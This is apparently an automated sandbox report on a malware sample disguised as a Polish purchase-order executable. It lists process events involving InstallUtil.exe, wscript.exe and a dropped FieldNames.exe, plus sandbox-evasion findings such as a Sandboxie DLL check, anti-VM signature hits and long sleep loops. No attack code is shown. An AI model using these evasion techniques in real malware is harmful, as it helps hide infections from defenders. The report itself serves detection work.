Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Memory allocated: 15E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Memory allocated: 3060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Memory allocated: 13C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Memory allocated: 4E50000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Window / User API: threadDelayed 1955	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Window / User API: threadDelayed 5998	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Window / User API: threadDelayed 2620	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Window / User API: threadDelayed 4112	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2612	Thread sleep count: 1955 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2612	Thread sleep count: 5998 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99651s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98761s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98613s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98361s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98178s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97667s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -95919s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -95812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 4500	Thread sleep count: 2620 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 4500	Thread sleep count: 4112 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98843s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98734s >= -30000s	Jump to behavior
